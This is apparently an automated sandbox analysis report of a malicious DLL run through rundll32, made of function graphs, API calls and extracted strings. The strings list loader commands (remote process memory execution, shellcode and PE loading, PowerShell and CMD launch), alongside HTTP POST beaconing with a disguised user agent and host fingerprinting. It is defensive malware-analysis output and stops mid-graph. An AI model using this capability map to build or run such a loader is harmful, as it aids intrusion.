45191 7fa7a170 45178->45191 45195 7fa64940 42 API calls std::ios_base::clear 45179->45195 45183 7fa6d3e8 45196 7fa94010 42 API calls 2 library calls 45183->45196 45185 7fa6d40a 45197 7fabe725 RaiseException 45185->45197 45187 7fa6d41b 45188 7fa91370 std::ios_base::clear 41 API calls 45187->45188 45189 7fa6d427 45188->45189 45190 7fa91370 std::ios_base::clear 41 API calls 45189->45190 45190->45178 45192 7fa6d486 45191->45192 45193 7fa7a18c 45191->45193 45192->44808 45194 7fa92510 42 API calls 45193->45194 45194->45192 45195->45183 45196->45185 45197->45187 45200 7faafae3 45198->45200 45199 7fa91370 std::ios_base::clear 41 API calls 45201 7fa941c1 45199->45201 45200->45199 45201->44816 45203 7fab557b 45202->45203 45204 7fa76a80 numpunct 42 API calls 45203->45204 45205 7fab569e 45204->45205 45206 7fa91370 std::ios_base::clear 41 API calls 45205->45206 45207 7fa941e2 45206->45207 45207->44820 45213 7fa6bad0 45208->45213 45211 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 45212 7fa631a4 45211->45212 45212->44827 45222 7fa91eb0 45213->45222 45216 7fa76a80 numpunct 42 API calls 45218 7fa6bb56 45216->45218 45217 7fa6bb7f 45231 7fa798d0 45217->45231 45218->45217 45235 7facbfcd 83 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45218->45235 45221 7fa6bbba 45221->45211 45223 7fa91eca 45222->45223 45224 7fa91ecf 45222->45224 45236 7fa90cf0 RaiseException Concurrency::cancel_current_task 45223->45236 45226 7fa91edf 45224->45226 45227 7fa91ef0 45224->45227 45237 7fa64b60 42 API calls 3 library calls 45226->45237 45228 7fa6bafc 45227->45228 45230 7fabd43b std::_Facet_Register 3 API calls 45227->45230 45228->45216 45230->45228 45232 7fa798f7 45231->45232 45233 7fa7993c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 45231->45233 45232->45233 45238 7fa8d9b0 41 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45232->45238 45233->45221 45235->45217 45236->45224 45237->45228 45238->45233

                          Executed Functions

                          Function 7FA8963F Relevance: 36.7, APIs: 1, Strings: 22, Instructions: 2156sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7fa8963f-7fa89657 1 7fa8965a-7fa89697 call 7fa646c0 call 7fa6d4a0 call 7fa99020 0->1 7 7fa897fd-7fa89955 call 7fa646c0 call 7fa6d4a0 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa92480 call 7fa95ea0 1->7 8 7fa8969d-7fa897f8 call 7fa646c0 call 7fa6d4a0 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa92480 call 7fa95ea0 1->8 55 7fa8995a-7fa8997d call 7fa646c0 call 7fa643b0 7->55 8->55 61 7fa89ca2-7fa89cc5 call 7fa646c0 call 7fa643b0 55->61 62 7fa89983-7fa899dd call 7fa646c0 call 7fa6d4a0 call 7fa9a980 55->62 72 7fa89ccb-7fa89d04 call 7fa646c0 call 7fa64850 call 7fa9c2e0 61->72 73 7fa89f6c-7fa89f8f call 7fa646c0 call 7fa643b0 61->73 78 7fa899e3-7fa89b40 call 7fa646c0 call 7fa6d4a0 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa92480 call 7fa95ea0 62->78 79 7fa89b45-7fa89c9d call 7fa646c0 call 7fa6d4a0 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa92480 call 7fa95ea0 62->79 99 7fa89d0a-7fa89e39 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 72->99 100 7fa89e3e-7fa89f67 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 72->100 90 7fa8a235-7fa8a258 call 7fa646c0 call 7fa643b0 73->90 91 7fa89f95-7fa89fcd call 7fa646c0 call 7fa64850 call 7fa9e560 73->91 78->61 79->61 121 7fa8a4fe-7fa8a521 call 7fa646c0 call 7fa643b0 90->121 122 7fa8a25e-7fa8a3cb call 7fa646c0 call 7fa64850 call 7faa06d0 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 90->122 133 7fa89fd3-7fa8a102 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 91->133 134 7fa8a107-7fa8a230 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 91->134 99->73 100->73 162 7fa8a7d6-7fa8a7f9 call 7fa646c0 call 7fa643b0 121->162 163 7fa8a527-7fa8a6a3 call 7fa646c0 call 7fa64850 call 7fab58e0 call 7fa795b0 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 121->163 122->121 133->90 134->90 201 7fa8aaae-7fa8aad1 call 7fa646c0 call 7fa643b0 162->201 202 7fa8a7ff-7fa8a97b call 7fa646c0 call 7fa64850 call 7fab6d80 call 7fa795b0 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 162->202 163->162 253 7fa8ad77-7fa8ad9a call 7fa646c0 call 7fa643b0 201->253 254 7fa8aad7-7fa8ac44 call 7fa646c0 call 7fa64850 call 7fa8c820 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 201->254 202->201 300 7fa8b040-7fa8b063 call 7fa646c0 call 7fa643b0 253->300 301 7fa8ada0-7fa8af0d call 7fa646c0 call 7fa64850 call 7fa8c4d0 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 253->301 254->253 341 7fa8b309-7fa8b32c call 7fa646c0 call 7fa643b0 300->341 342 7fa8b069-7fa8b1d6 call 7fa646c0 call 7fa64850 call 7fa8d3b0 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 300->342 301->300 371 7fa8b5d2-7fa8b5f5 call 7fa646c0 call 7fa643b0 341->371 372 7fa8b332-7fa8b49f call 7fa646c0 call 7fa64850 call 7fa86bd0 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 341->372 342->341 406 7fa8b89b-7fa8b8be call 7fa646c0 call 7fa643b0 371->406 407 7fa8b5fb-7fa8b768 call 7fa646c0 call 7fa64850 call 7fa86a20 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 371->407 372->371 446 7fa8bb64-7fa8bb87 call 7fa646c0 call 7fa643b0 406->446 447 7fa8b8c4-7fa8ba31 call 7fa646c0 call 7fa64850 call 7fa8cb70 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 406->447 407->406 483 7fa8be2d-7fa8be50 call 7fa646c0 call 7fa643b0 446->483 484 7fa8bb8d-7fa8bcfa call 7fa646c0 call 7fa64850 call 7fa8d230 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 446->484 447->446 520 7fa8c105-7fa8c210 call 7fa76a80 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 483->520 521 7fa8be56-7fa8bfd2 call 7fa646c0 call 7fa64850 call 7fa87690 call 7fa795b0 call 7fa646c0 call 7fa64850 call 7fa76650 * 4 call 7faa9aa0 call 7fa76650 * 2 call 7faae200 call 7fa79520 483->521 484->483 611 7fa8c215-7fa8c220 call 7faae200 520->611 521->520 617 7fa8c225-7fa8c46e call 7fa7a050 GetPEB call 7fa6d360 611->617 650 7fa8c473-7fa8c47f Sleep 617->650 652 7fa895e0-7fa89610 call 7fa646c0 call 7fa645d0 650->652 652->520 659 7fa89616-7fa89639 call 7fa646c0 call 7fa643b0 652->659 659->0 659->55
                          APIs
                            • Part of subcall function 7FA95EA0: std::exception::exception.LIBCMTD ref: 7FA95ED0
                          • Sleep.KERNEL32(?), ref: 7FA8C479
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleepstd::exception::exception
                          • String ID: 7$Dll launch(Regsvr32)$Dll launch(RunDll32)$ExecuteDllRemoteProcessMemory$ExecuteRemoteProcessMemory$Install MSI Package$Launch command CMD$Launch command PS$Launch console exe$Launch exe$Launch with privileges$Loader bin shellCode$Loader bin shellCode #2$PeLoader Dll & EXE$PeLoader Dll Start$PeLoader Dll dllregisterserver$TPd$VQmR$cKC$paU${$!#
                          • API String ID: 2541862923-4091641541
                          • Opcode ID: fd42ea9921e2537aee465c983781e15378742dfaaa612b13e9f0245a198c02cc
                          • Instruction ID: a5f42de9a27f2e50a3baa937896db39a39d47a9343bbb61543d7cf9617ae8b48
                          • Opcode Fuzzy Hash: fd42ea9921e2537aee465c983781e15378742dfaaa612b13e9f0245a198c02cc
                          • Instruction Fuzzy Hash: B9235CB1D04358DBCB15EFB8CE45BDEBBB4AB49200F5081DDD40DA7255EA385B848FA2
                          Function 7FAB1890 Relevance: 20.6, APIs: 5, Strings: 5, Instructions: 3140networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7FA63EA0: std::ios_base::clear.LIBCPMTD ref: 7FA6430A
                          • HttpSendRequestA.WININET(?,?,?,?,?,User-Agent: Microsoft-WNS/10.0Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CA,?,?), ref: 7FAB38CB
                          • InternetReadFile.WININET(?,?,?,?), ref: 7FAB439F
                          • InternetCloseHandle.WININET(?), ref: 7FAB4E72
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7FAB54BB
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7FAB5507
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InternetIos_base_dtorstd::ios_base::_$CloseFileHandleHttpReadRequestSendstd::ios_base::clear
                          • String ID: $Microsoft-WNS/10.0$POST$User-Agent: Microsoft-WNS/10.0Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CA$}>
                          • API String ID: 1857752463-2552320425
                          • Opcode ID: a90ca2965d598ba8edadeb044946b620b21702fb3c05664436dd1f1d6fae77a9
                          • Instruction ID: 890096bedc0b15a062c915356c286f538608afac733596edbaa4562190330ea8
                          • Opcode Fuzzy Hash: a90ca2965d598ba8edadeb044946b620b21702fb3c05664436dd1f1d6fae77a9
                          • Instruction Fuzzy Hash: 4883CDB4E052698FDB69CF18C990B99BBB5BF89304F1081DAD84DA7345DB34AE81CF50
                          Function 7FAACE30 Relevance: 12.9, APIs: 2, Strings: 5, Instructions: 635COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1256 7faace30-7faace59 call 7fa7dfc0 1259 7faace64-7faace68 1256->1259 1260 7faace6a-7faaceac 1259->1260 1261 7faaceae-7faacefc call 7fa72010 1259->1261 1260->1259 1266 7faacf08-7faacfb6 1261->1266 1267 7faacefe-7faacf03 1261->1267 1269 7faacfc1-7faacfc5 1266->1269 1268 7faad8d4-7faad8d9 1267->1268 1270 7faad00c-7faad11e call 7fa72250 CoInitializeSecurity 1269->1270 1271 7faacfc7-7faad00a 1269->1271 1275 7faad129-7faad12d 1270->1275 1271->1269 1276 7faad12f-7faad172 1275->1276 1277 7faad174-7faad1d1 call 7fa72220 1275->1277 1276->1275 1282 7faad332-7faad3dd 1277->1282 1283 7faad1d7-7faad294 1277->1283 1285 7faad3e8-7faad3ec 1282->1285 1284 7faad29f-7faad2a3 1283->1284 1288 7faad2ea-7faad32d call 7fa721f0 1284->1288 1289 7faad2a5-7faad2e8 1284->1289 1286 7faad3ee-7faad431 1285->1286 1287 7faad433-7faad495 1285->1287 1286->1285 1295 7faad49b-7faad53e 1287->1295 1296 7faad5dc-7faad699 1287->1296 1288->1268 1289->1284 1304 7faad549-7faad54d 1295->1304 1297 7faad6a4-7faad6a8 1296->1297 1299 7faad6aa-7faad6ed 1297->1299 1300 7faad6ef-7faad74e call 7fa71f80 CoSetProxyBlanket 1297->1300 1299->1297 1308 7faad8d2 1300->1308 1309 7faad754-7faad837 1300->1309 1306 7faad54f-7faad592 1304->1306 1307 7faad594-7faad5d7 call 7fa721f0 1304->1307 1306->1304 1307->1268 1308->1268 1316 7faad842-7faad846 1309->1316 1317 7faad848-7faad88b 1316->1317 1318 7faad88d-7faad8d0 call 7fa721f0 1316->1318 1317->1316 1318->1268
                          APIs
                          • CoInitializeSecurity.COMBASE(00000000,00000000), ref: 7FAAD05A
                          • CoSetProxyBlanket.COMBASE(00000000,00000000,00000003,00000003,00000000,00000000), ref: 7FAAD740
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: BlanketInitializeProxySecurity
                          • String ID: #$$$8$n${
                          • API String ID: 257369873-1307703517
                          • Opcode ID: fe380c6530bf23cbe396ee1bc308aed36b62f89c1184b5a63e1ccbbc147734f3
                          • Instruction ID: 3e0fd5216ad0e54145d015b4eb22244e9ef28e77e400302ec3043a90f51cff1f
                          • Opcode Fuzzy Hash: fe380c6530bf23cbe396ee1bc308aed36b62f89c1184b5a63e1ccbbc147734f3
                          • Instruction Fuzzy Hash: 1B621534A04259CADB25CFA4C850BDEB7B2FF98300F1081A9D50DAB394E77A5E85CF59
                          Function 7FAAB7C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1399 7faab7c0-7faab804 GetPEB 1400 7faab807-7faab850 1399->1400 1401 7faab85b 1400->1401 1402 7faab852-7faab859 1400->1402 1403 7faab862-7faab86e 1401->1403 1402->1403 1404 7faab930-7faab94e 1403->1404 1405 7faab874-7faab87a 1403->1405 1404->1400 1406 7faab954 1404->1406 1407 7faab87d-7faab890 1405->1407 1408 7faab95b-7faab998 GlobalMemoryStatusEx call 7fabd810 * 2 1406->1408 1407->1404 1409 7faab896-7faab8b1 1407->1409 1411 7faab8b8-7faab8cf 1409->1411 1412 7faab8d9-7faab8ea 1411->1412 1413 7faab8d1-7faab8f3 1411->1413 1412->1411 1417 7faab92b 1413->1417 1418 7faab8f5-7faab929 1413->1418 1417->1407 1418->1408
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$GlobalMemoryStatus
                          • String ID: @
                          • API String ID: 2185283323-2766056989
                          • Opcode ID: 8f4327d78afd992af99b9dc86709621e753d4fef7de84b3ac0bd8da03f72720a
                          • Instruction ID: 542af5c4198f6379600b9b940d9c8450e66b85b0ab680e78d3e9a5e4783a3fd8
                          • Opcode Fuzzy Hash: 8f4327d78afd992af99b9dc86709621e753d4fef7de84b3ac0bd8da03f72720a
                          • Instruction Fuzzy Hash: 55718EB8E04259DFCB04CF99C590AEEFBB1BF48304F20819AD915AB349D735AA45CF94
                          Function 7FAABC90 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1508 7faabc90-7faabced GetPEB 1509 7faabcf0-7faabd45 1508->1509 1510 7faabd50 1509->1510 1511 7faabd47-7faabd4e 1509->1511 1512 7faabd57-7faabd63 1510->1512 1511->1512 1513 7faabd69-7faabd6f 1512->1513 1514 7faabe25-7faabe43 1512->1514 1516 7faabd72-7faabd85 1513->1516 1514->1509 1515 7faabe49 1514->1515 1517 7faabe50-7faabe68 GetComputerNameExA 1515->1517 1516->1514 1518 7faabd8b-7faabda6 1516->1518 1519 7faabe6a-7faabe77 1517->1519 1520 7faabed5-7faabeed call 7fa721c0 1517->1520 1521 7faabdad-7faabdc4 1518->1521 1524 7faabe7d-7faabe8d 1519->1524 1534 7faabeef-7faabefc 1520->1534 1535 7faabf57-7faabf66 1520->1535 1522 7faabdce-7faabddf 1521->1522 1523 7faabdc6-7faabde8 1521->1523 1522->1521 1529 7faabdea-7faabe1e 1523->1529 1530 7faabe20 1523->1530 1524->1524 1527 7faabe8f-7faabed0 call 7fa92510 1524->1527 1536 7faabfc1-7faabfc4 1527->1536 1529->1517 1530->1516 1537 7faabf02-7faabf12 1534->1537 1538 7faabf6c-7faabf7c 1535->1538 1537->1537 1539 7faabf14-7faabf55 call 7fa92510 1537->1539 1538->1538 1540 7faabf7e-7faabfbc call 7fa92510 1538->1540 1539->1536 1540->1536
                          APIs
                          • GetComputerNameExA.KERNEL32(?,?,?), ref: 7FAABE63
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ComputerName
                          • String ID: WORKGROUP
                          • API String ID: 3545744682-2380569353
                          • Opcode ID: d1e86ca270928f30920770cb54930f6278bb8cfba8a93438cc6395b1b1686442
                          • Instruction ID: 39b33745c25349cdc7e7eaf358881d388d9dd6a0aaf7ce1add4b00538e680d51
                          • Opcode Fuzzy Hash: d1e86ca270928f30920770cb54930f6278bb8cfba8a93438cc6395b1b1686442
                          • Instruction Fuzzy Hash: F3B1CC74E052589FDB18CFA8C990BEDFBB2BF48304F248199D819AB345D735AA85CF50
                          Function 7FABAFE0 Relevance: 3.3, APIs: 2, Instructions: 347COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1544 7fabafe0-7fabaff3 call 7fa87a60 1547 7fabaff9-7fabb000 call 7fa92a30 1544->1547 1548 7fabb512-7fabb517 1544->1548 1552 7fabb509-7fabb50e 1547->1552 1553 7fabb006-7fabb035 call 7fa7c9e0 1547->1553 1549 7fabb51b-7fabb51e 1548->1549 1552->1549 1556 7fabb058-7fabb09e GetPEB 1553->1556 1557 7fabb037-7fabb054 call 7fa93490 1553->1557 1559 7fabb0a1-7fabb0f6 1556->1559 1557->1556 1561 7fabb0f8-7fabb0ff 1559->1561 1562 7fabb101 1559->1562 1563 7fabb108-7fabb114 1561->1563 1562->1563 1564 7fabb11a-7fabb120 1563->1564 1565 7fabb1e8-7fabb212 1563->1565 1567 7fabb123-7fabb136 1564->1567 1565->1559 1566 7fabb218 1565->1566 1568 7fabb21f-7fabb24e call 7fa87920 1566->1568 1567->1565 1569 7fabb13c-7fabb157 1567->1569 1579 7fabb258-7fabb30c GetPEB 1568->1579 1580 7fabb250-7fabb252 ExitProcess 1568->1580 1570 7fabb15e-7fabb175 1569->1570 1572 7fabb17f-7fabb190 1570->1572 1573 7fabb177-7fabb199 1570->1573 1572->1570 1577 7fabb19b-7fabb1e1 1573->1577 1578 7fabb1e3 1573->1578 1577->1568 1578->1567 1581 7fabb30f-7fabb36a 1579->1581 1582 7fabb36c-7fabb373 1581->1582 1583 7fabb375 1581->1583 1584 7fabb37c-7fabb388 1582->1584 1583->1584 1585 7fabb46e-7fabb498 1584->1585 1586 7fabb38e-7fabb394 1584->1586 1585->1581 1587 7fabb49e 1585->1587 1588 7fabb397-7fabb3b0 1586->1588 1590 7fabb4a5-7fabb4eb CreateThread call 7fa72100 1587->1590 1588->1585 1589 7fabb3b6-7fabb3d7 1588->1589 1591 7fabb3de-7fabb3f5 1589->1591 1595 7fabb4f0-7fabb519 call 7fa72370 1590->1595 1593 7fabb402-7fabb413 1591->1593 1594 7fabb3f7-7fabb41f 1591->1594 1593->1591 1597 7fabb469 1594->1597 1598 7fabb421-7fabb467 1594->1598 1595->1549 1597->1588 1598->1590
                          APIs
                            • Part of subcall function 7FA93490: __aullrem.LIBCMT ref: 7FA934E5
                            • Part of subcall function 7FA87920: CreateMutexA.KERNEL32(00000000,00000001,7FABB249,?,?,7FABB249,?), ref: 7FA8792C
                          • ExitProcess.KERNEL32 ref: 7FABB252
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateExitMutexProcess__aullrem
                          • String ID:
                          • API String ID: 1029110445-0
                          • Opcode ID: 5c59cc7c28910241b7cc9c7cb0df05fb8ab531d11696fed6b332e565c0a06e86
                          • Instruction ID: a51333641cb0b5a90e332fd3018e0e2c377e78ec2991d2256196e3eef1f4a876
                          • Opcode Fuzzy Hash: 5c59cc7c28910241b7cc9c7cb0df05fb8ab531d11696fed6b332e565c0a06e86
                          • Instruction Fuzzy Hash: 6002D078E04259CFDB18CF98C990BEDBBB6BF48304F10819AD819AB355D734AA85CF54
                          Function 7FAA8860 Relevance: 2.4, APIs: 1, Instructions: 863COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2092 7faa8860-7faa88db call 7fabd920 GetPEB 2095 7faa88e1-7faa893f 2092->2095 2096 7faa894d 2095->2096 2097 7faa8941-7faa894b 2095->2097 2098 7faa8957-7faa8966 2096->2098 2097->2098 2099 7faa896c-7faa8972 2098->2099 2100 7faa8a67-7faa8a97 2098->2100 2101 7faa8975-7faa898e 2099->2101 2100->2095 2102 7faa8a9d 2100->2102 2101->2100 2103 7faa8994-7faa89b8 2101->2103 2104 7faa8aa7-7faa8aca GetAdaptersInfo 2102->2104 2105 7faa89c2-7faa89e2 2103->2105 2106 7faa8e5e-7faa8ee7 call 7fa83950 call 7fa952b0 GetPEB 2104->2106 2107 7faa8ad0-7faa8bd1 call 7fa823a0 call 7fa955b0 GetPEB 2104->2107 2108 7faa89f2-7faa8a09 2105->2108 2109 7faa89e4-7faa8a15 2105->2109 2122 7faa8eed-7faa8f4b 2106->2122 2121 7faa8bd7-7faa8c35 2107->2121 2108->2105 2115 7faa8a62 2109->2115 2116 7faa8a17-7faa8a60 2109->2116 2115->2101 2116->2104 2123 7faa8c43 2121->2123 2124 7faa8c37-7faa8c41 2121->2124 2125 7faa8f59 2122->2125 2126 7faa8f4d-7faa8f57 2122->2126 2127 7faa8c4d-7faa8c5c 2123->2127 2124->2127 2128 7faa8f63-7faa8f72 2125->2128 2126->2128 2131 7faa8d5d-7faa8d8d 2127->2131 2132 7faa8c62-7faa8c68 2127->2132 2129 7faa8f78-7faa8f7e 2128->2129 2130 7faa9073-7faa90a3 2128->2130 2133 7faa8f81-7faa8f9a 2129->2133 2130->2122 2135 7faa90a9 2130->2135 2131->2121 2136 7faa8d93 2131->2136 2134 7faa8c6b-7faa8c84 2132->2134 2133->2130 2138 7faa8fa0-7faa8fc4 2133->2138 2134->2131 2139 7faa8c8a-7faa8cae 2134->2139 2140 7faa90b3-7faa915a call 7fa80c10 call 7fa953b0 GetPEB 2135->2140 2137 7faa8d9d-7faa8e01 2136->2137 2149 7faa8e07-7faa8e17 2137->2149 2141 7faa8fce-7faa8fee 2138->2141 2142 7faa8cb8-7faa8cd8 2139->2142 2163 7faa9160-7faa91ca 2140->2163 2144 7faa8ffe-7faa9015 2141->2144 2145 7faa8ff0-7faa9021 2141->2145 2146 7faa8cda-7faa8d0b 2142->2146 2147 7faa8ce8-7faa8cff 2142->2147 2144->2141 2154 7faa906e 2145->2154 2155 7faa9023-7faa906c 2145->2155 2156 7faa8d58 2146->2156 2157 7faa8d0d-7faa8d56 2146->2157 2147->2142 2149->2149 2153 7faa8e19-7faa8e59 call 7fa92510 2149->2153 2164 7faa975d-7faa9760 2153->2164 2154->2133 2155->2140 2156->2134 2157->2137 2165 7faa91d8 2163->2165 2166 7faa91cc-7faa91d6 2163->2166 2167 7faa91e2-7faa91f1 2165->2167 2166->2167 2168 7faa930d-7faa933d 2167->2168 2169 7faa91f7-7faa9200 2167->2169 2168->2163 2170 7faa9343 2168->2170 2171 7faa9203-7faa921c 2169->2171 2172 7faa934d-7faa93f5 call 7fa7ffa0 call 7fa95570 GetPEB 2170->2172 2171->2168 2173 7faa9222-7faa924f 2171->2173 2185 7faa93fb-7faa9459 2172->2185 2174 7faa9259-7faa9279 2173->2174 2176 7faa927b-7faa92ac 2174->2176 2177 7faa9289-7faa92a0 2174->2177 2181 7faa9308 2176->2181 2182 7faa92ae-7faa9306 2176->2182 2177->2174 2181->2171 2182->2172 2186 7faa945b-7faa9465 2185->2186 2187 7faa9467 2185->2187 2188 7faa9471-7faa9480 2186->2188 2187->2188 2189 7faa9581-7faa95b1 2188->2189 2190 7faa9486-7faa948c 2188->2190 2189->2185 2191 7faa95b7 2189->2191 2192 7faa948f-7faa94a8 2190->2192 2193 7faa95c1-7faa9705 call 7fa72130 call 7fa7e370 call 7fa94cb0 call 7fa71ef0 * 2 call 7fa81800 call 7fa94d30 call 7fa71ef0 * 2 call 7fa7b720 call 7fa94bb0 call 7fa71ef0 call 7fabb640 2191->2193 2192->2189 2194 7faa94ae-7faa94d2 2192->2194 2234 7faa970b-7faa971b 2193->2234 2195 7faa94dc-7faa94fc 2194->2195 2196 7faa94fe-7faa952f 2195->2196 2197 7faa950c-7faa9523 2195->2197 2201 7faa957c 2196->2201 2202 7faa9531-7faa957a 2196->2202 2197->2195 2201->2192 2202->2193 2234->2234 2235 7faa971d-7faa9758 call 7fa92510 2234->2235 2235->2164
                          APIs
                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 7FAA8AB7
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdaptersInfo
                          • String ID:
                          • API String ID: 3177971545-0
                          • Opcode ID: 66f0175c6fdebab2ba0cf250ed6b4e7a9482c21d6fba139fb52550ecd1aaeaf2
                          • Instruction ID: 3b77eb246fc68a350f506c8c0c3255bfc396746498cd1f660c99177edd0026d4
                          • Opcode Fuzzy Hash: 66f0175c6fdebab2ba0cf250ed6b4e7a9482c21d6fba139fb52550ecd1aaeaf2
                          • Instruction Fuzzy Hash: B0A2BF74E052698FCB68CF58C894BDDBBB1BF88304F1081EAD849A7355DB35AA85CF50
                          Function 7FA92A30 Relevance: 2.1, APIs: 1, Instructions: 611COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2237 7fa92a30-7fa92a6d call 7fa7f6b0 2240 7fa92a78-7fa92a7c 2237->2240 2241 7fa92a7e-7fa92ac0 2240->2241 2242 7fa92ac2-7fa92b4e GetPEB 2240->2242 2241->2240 2244 7fa92b51-7fa92bac 2242->2244 2245 7fa92bba 2244->2245 2246 7fa92bae-7fa92bb8 2244->2246 2247 7fa92bc4-7fa92bd3 2245->2247 2246->2247 2248 7fa92bd9-7fa92bdf 2247->2248 2249 7fa92cbc-7fa92ce6 2247->2249 2251 7fa92be2-7fa92bfb 2248->2251 2249->2244 2250 7fa92cec 2249->2250 2252 7fa92cf6-7fa92d4b call 7fa7cbf0 2250->2252 2251->2249 2253 7fa92c01-7fa92c22 2251->2253 2263 7fa92d56-7fa92d5a 2252->2263 2254 7fa92c29-7fa92c40 2253->2254 2256 7fa92c4d-7fa92c5e 2254->2256 2257 7fa92c42-7fa92c6a 2254->2257 2256->2254 2260 7fa92c6c-7fa92cb5 2257->2260 2261 7fa92cb7 2257->2261 2260->2252 2261->2251 2264 7fa92d5c-7fa92d9e 2263->2264 2265 7fa92da0-7fa92e2c GetPEB 2263->2265 2264->2263 2267 7fa92e32-7fa92e90 2265->2267 2268 7fa92e9e 2267->2268 2269 7fa92e92-7fa92e9c 2267->2269 2270 7fa92ea8-7fa92eb7 2268->2270 2269->2270 2271 7fa92fb8-7fa92fe8 2270->2271 2272 7fa92ebd-7fa92ec3 2270->2272 2271->2267 2274 7fa92fee 2271->2274 2273 7fa92ec6-7fa92edf 2272->2273 2273->2271 2275 7fa92ee5-7fa92f09 2273->2275 2276 7fa92ff8-7fa93079 GetPEB 2274->2276 2277 7fa92f13-7fa92f33 2275->2277 2281 7fa9307f-7fa930dd 2276->2281 2279 7fa92f43-7fa92f5a 2277->2279 2280 